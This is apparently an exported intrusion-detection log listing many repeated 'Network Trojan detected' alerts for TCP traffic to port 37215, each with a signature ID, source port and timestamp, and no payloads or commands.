          SID:2829579
          Source Port:40262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226073
          SID:2829579
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866055
          SID:2829579
          Source Port:49626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820203
          SID:2835222
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945565
          SID:2835222
          Source Port:48236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119913
          SID:2829579
          Source Port:44446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566065
          SID:2835222
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539063
          SID:2829579
          Source Port:51652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598620
          SID:2835222
          Source Port:48320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696410
          SID:2835222
          Source Port:35500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693025
          SID:2835222
          Source Port:57022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988840
          SID:2835222
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285599
          SID:2835222
          Source Port:49964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557466
          SID:2829579
          Source Port:53450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167496
          SID:2835222
          Source Port:43998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923676
          SID:2829579
          Source Port:59792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162353
          SID:2835222
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161501
          SID:2829579
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716986
          SID:2835222
          Source Port:38770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539669
          SID:2829579
          Source Port:35162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000919
          SID:2835222
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987120
          SID:2835222
          Source Port:52658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658862
          SID:2829579
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288112
          SID:2835222
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086533
          SID:2835222
          Source Port:38770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465348
          SID:2835222
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469679
          SID:2835222
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647723
          SID:2835222
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415401
          SID:2835222
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169307
          SID:2829579
          Source Port:45062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397498
          SID:2835222
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165072
          SID:2835222
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861227
          SID:2829579
          Source Port:38786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292939
          SID:2835222
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945612
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687435
          SID:2835222
          Source Port:50294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720271
          SID:2835222
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030609
          SID:2829579
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158368
          SID:2829579
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986907
          SID:2829579
          Source Port:38530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606941
          SID:2829579
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119739
          SID:2829579
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602517
          SID:2835222
          Source Port:34776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918931
          SID:2829579
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948615
          SID:2829579
          Source Port:36318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996725
          SID:2835222
          Source Port:54276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249548
          SID:2829579
          Source Port:39232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601017
          SID:2835222
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034292
          SID:2829579
          Source Port:35260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130072
          SID:2835222
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289228
          SID:2835222
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866101
          SID:2829579
          Source Port:40616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719024
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946897
          SID:2835222
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865246
          SID:2835222
          Source Port:44110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397746
          SID:2829579
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924393
          SID:2829579
          Source Port:41738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014937
          SID:2829579
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864443
          SID:2835222
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169708
          SID:2829579
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870693
          SID:2835222
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643572
          SID:2835222
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008446
          SID:2829579
          Source Port:39546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038758
          SID:2835222
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475854
          SID:2829579
          Source Port:48894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917754
          SID:2835222
          Source Port:50806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030632
          SID:2835222
          Source Port:47682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713476
          SID:2829579
          Source Port:42666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716942
          SID:2829579
          Source Port:57038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945421
          SID:2829579
          Source Port:53332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397690
          SID:2835222
          Source Port:35858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130076
          SID:2835222
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540432
          SID:2829579
          Source Port:46382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557970
          SID:2829579
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721428
          SID:2835222
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719800
          SID:2835222
          Source Port:59564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601896
          SID:2829579
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134504
          SID:2835222
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400271
          SID:2835222
          Source Port:57092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067385
          SID:2829579
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478902
          SID:2835222
          Source Port:60996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924665
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643436
          SID:2835222
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818063
          SID:2829579
          Source Port:44912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166100
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102201
          SID:2829579
          Source Port:32856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538414
          SID:2835222
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399883
          SID:2835222
          Source Port:41958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286115
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292509
          SID:2829579
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.950818
          SID:2835222
          Source Port:49826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250602
          SID:2829579
          Source Port:43734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719252
          SID:2829579
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081623
          SID:2835222
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030745
          SID:2835222
          Source Port:36306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984204
          SID:2829579
          Source Port:45708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160285
          SID:2835222
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396225
          SID:2829579
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820102
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862027
          SID:2835222
          Source Port:54242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246771
          SID:2835222
          Source Port:52478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159923
          SID:2829579
          Source Port:45544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102196
          SID:2829579
          Source Port:43290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478841
          SID:2835222
          Source Port:56762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079362
          SID:2835222
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720207
          SID:2835222
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868811
          SID:2829579
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645228
          SID:2835222
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247662
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718900
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166363
          SID:2829579
          Source Port:58170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928045
          SID:2829579
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819772
          SID:2829579
          Source Port:44600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418813
          SID:2835222
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867724
          SID:2829579
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248783
          SID:2835222
          Source Port:60752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929709
          SID:2829579
          Source Port:55794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477940
          SID:2829579
          Source Port:43786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920203
          SID:2835222
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539816
          SID:2829579
          Source Port:52516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285456
          SID:2835222
          Source Port:55166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085540
          SID:2835222
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159885
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909149
          SID:2835222
          Source Port:45172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026930
          SID:2829579
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476144
          SID:2835222
          Source Port:41404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823178
          SID:2829579
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469833
          SID:2835222
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869866
          SID:2835222
          Source Port:46388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287884
          SID:2835222
          Source Port:32780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103567
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987923
          SID:2829579
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473573
          SID:2835222
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900187
          SID:2835222
          Source Port:37090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131168
          SID:2829579
          Source Port:33798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284159
          SID:2829579
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306464
          SID:2835222
          Source Port:50360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281928
          SID:2835222
          Source Port:52124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397746
          SID:2835222
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288946
          SID:2835222
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645708
          SID:2829579
          Source Port:35296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644274
          SID:2835222
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653549
          SID:2829579
          Source Port:60112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102652
          SID:2835222
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289198
          SID:2835222
          Source Port:50438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418835
          SID:2835222
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100829
          SID:2835222
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720099
          SID:2835222
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930173
          SID:2829579
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471492
          SID:2835222
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038231
          SID:2829579
          Source Port:35160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413871
          SID:2829579
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480706
          SID:2829579
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164857
          SID:2835222
          Source Port:47612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947894
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919253
          SID:2835222
          Source Port:45416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910714
          SID:2835222
          Source Port:41394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017384
          SID:2829579
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952230
          SID:2829579
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557937
          SID:2835222
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277085
          SID:2835222
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283810
          SID:2835222
          Source Port:56284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557685
          SID:2829579
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038880
          SID:2829579
          Source Port:47224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103206
          SID:2829579
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821339
          SID:2835222
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418752
          SID:2835222
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.542770
          SID:2829579
          Source Port:41310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916740
          SID:2835222
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248146
          SID:2829579
          Source Port:33062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538223
          SID:2829579
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227490
          SID:2829579
          Source Port:41828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897883
          SID:2829579
          Source Port:42346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908865
          SID:2829579
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892932
          SID:2835222
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466889
          SID:2835222
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296751
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468026
          SID:2835222
          Source Port:53490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169471
          SID:2829579
          Source Port:35244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869697
          SID:2835222
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718174
          SID:2835222
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984170
          SID:2835222
          Source Port:56612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230356
          SID:2835222
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472220
          SID:2829579
          Source Port:48992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033065
          SID:2829579
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017822
          SID:2835222
          Source Port:48098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636238
          SID:2829579
          Source Port:33616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296991
          SID:2829579
          Source Port:52928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948389
          SID:2835222
          Source Port:45512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948883
          SID:2835222
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129679
          SID:2835222
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413978
          SID:2835222
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244305
          SID:2835222
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224996
          SID:2829579
          Source Port:37626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603692
          SID:2829579
          Source Port:51320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644445
          SID:2835222
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920427
          SID:2829579
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167289
          SID:2835222
          Source Port:34360
          Destination Port:37215
